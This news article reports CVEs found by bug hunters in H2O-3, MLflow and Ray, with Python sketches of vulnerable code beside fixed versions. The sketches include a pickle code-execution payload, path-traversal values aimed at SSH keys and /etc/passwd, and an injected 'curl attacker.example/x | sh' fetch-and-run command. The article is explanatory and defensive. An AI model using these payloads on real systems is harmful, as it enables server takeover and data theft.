Artificial Intelligence

Over a Dozen Exploitable Vulnerabilities Found in AI/ML Tools

Bug hunters uncover over a dozen exploitable vulnerabilities in tools used to build chatbots and other types of AI/ML models.

Since August 2023, members of the Huntr bug bounty platform for artificial intelligence (AI) and machine learning (ML) have uncovered over a dozen vulnerabilities exposing AI/ML models to system takeover and sensitive information theft.

Identified in tools with hundreds of thousands or millions of downloads per month, such as H2O-3, MLflow, and Ray, these issues potentially impact the entire AI/ML supply chain, says Protect AI, which manages Huntr.

H2O-3 is a low-code machine learning platform that supports the creation and deployment of ML models through a web interface, simply by importing data. It also allows users to upload Java objects remotely via API calls.

By default, the installation is exposed to the network and requires no authentication, so attackers can supply malicious Java objects that H2O-3 executes, giving them access to the underlying operating system.

Tracked as CVE-2023-6016 (CVSS score of 10), the remote code execution (RCE) vulnerability could allow attackers to completely take over the server and steal models, credentials, and other data.
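
The pattern behind this bug class can be sketched in a few lines of Python, with pickle standing in for H2O-3's Java object handling. This is an illustrative analog only, not the actual exploit; the class name and the command it runs are hypothetical.

    import os
    import pickle


    class Evil:
        # __reduce__ tells pickle how to rebuild the object on load;
        # here, "rebuilding" it runs an OS command instead.
        def __reduce__(self):
            return (os.system, ("id",))  # hypothetical, harmless command


    # What an attacker sends over the unauthenticated API:
    payload = pickle.dumps(Evil())

    # What the vulnerable service does: deserialize untrusted bytes.
    # This executes `id` on the server, i.e. remote code execution.
    pickle.loads(payload)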

The bug hunters uncovered two other critical issues in the low-code service, namely a local file inclusion flaw (CVE-2023-6038) and a cross-site scripting (XSS) bug (CVE-2023-6013), along with a high-severity S3 bucket takeover vulnerability (CVE-2023-6017).

MLflow, an open-source platform for the management of the end-to-end ML lifecycle, also lacks authentication by default, and the researchers identified four critical vulnerabilities in it.

The most severe of these are arbitrary file write and path traversal bugs (CVE-2023-6018 and CVE-2023-6015, both with a CVSS score of 10) that can allow an unauthenticated attacker to overwrite arbitrary files on the operating system and achieve RCE.
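
The underlying pattern can be sketched in Python as a handler that joins a user-supplied filename onto a base directory without normalizing it first. This is not MLflow's actual code; the directory and function names below are hypothetical.

    from pathlib import Path

    ARTIFACT_ROOT = Path("/srv/artifacts")  # hypothetical storage root


    def save_artifact_vulnerable(filename: str, data: bytes) -> None:
        # filename = "../../home/user/.ssh/authorized_keys" escapes the root.
        (ARTIFACT_ROOT / filename).write_bytes(data)


    def save_artifact_safe(filename: str, data: bytes) -> None:
        # Resolve ".." and symlinks, then refuse paths outside the root.
        target = (ARTIFACT_ROOT / filename).resolve()
        if not target.is_relative_to(ARTIFACT_ROOT.resolve()):
            raise ValueError("path traversal attempt blocked")
        target.write_bytes(data)

Resolving the final path and rejecting anything outside the intended root is the standard defense against this class of flaw.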

The tool was also found vulnerable to critical-severity arbitrary file inclusion (CVE-2023-1177) and authentication bypass (CVE-2023-6014) vulnerabilities.

The Ray project, an open-source framework for the distributed training of ML models, also lacks default authentication.

A critical code injection flaw in Ray’s cpu_profile format parameter (CVE-2023-6019, CVSS score of 10) could lead to full system compromise: the parameter was not validated before being inserted into a system command executed in a shell.
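
This bug class is straightforward to illustrate in Python. The sketch below is not Ray's actual source; the profiler command, its flag, and the allow-list are hypothetical.

    import subprocess

    ALLOWED_FORMATS = {"flamegraph", "speedscope"}  # hypothetical allow-list


    def cpu_profile_vulnerable(fmt: str) -> None:
        # fmt = "flamegraph; curl attacker.example/x | sh" appends a
        # second shell command, giving full code execution on the host.
        subprocess.run(f"profiler --format {fmt}", shell=True)


    def cpu_profile_safe(fmt: str) -> None:
        if fmt not in ALLOWED_FORMATS:
            raise ValueError(f"unsupported format: {fmt}")
        # Argument list with shell=False: fmt is passed as a single
        # argument and can never break out into the shell.
        subprocess.run(["profiler", "--format", fmt], check=True)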

The bug hunters also identified two critical local file inclusion issues, tracked as CVE-2023-6020 and CVE-2023-6021, that could allow remote attackers to read any file on the Ray system.
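
The read-side counterpart of the traversal pattern looks much the same. Again, this is an illustrative Python sketch rather than Ray's source, and the log directory is hypothetical.

    import os

    LOG_ROOT = "/var/log/myapp"  # hypothetical log directory


    def read_log_vulnerable(name: str) -> bytes:
        # name = "../../../etc/passwd" walks out of LOG_ROOT.
        with open(os.path.join(LOG_ROOT, name), "rb") as f:
            return f.read()


    def read_log_safe(name: str) -> bytes:
        root = os.path.realpath(LOG_ROOT)
        # realpath collapses ".." and follows symlinks before the check.
        path = os.path.realpath(os.path.join(LOG_ROOT, name))
        if os.path.commonpath([root, path]) != root:
            raise PermissionError("requested file is outside the log directory")
        with open(path, "rb") as f:
            return f.read()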

All vulnerabilities were reported to vendors at least 45 days prior to public disclosure. Users are advised to update their installations to the latest non-vulnerable versions and restrict access to the applications where patches are not available. 

Related: The Good, the Bad and the Ugly of Generative AI

Related: OpenAI Patches Account Takeover Vulnerabilities in ChatGPT

Related: Major ChatGPT Outage Caused by DDoS Attack
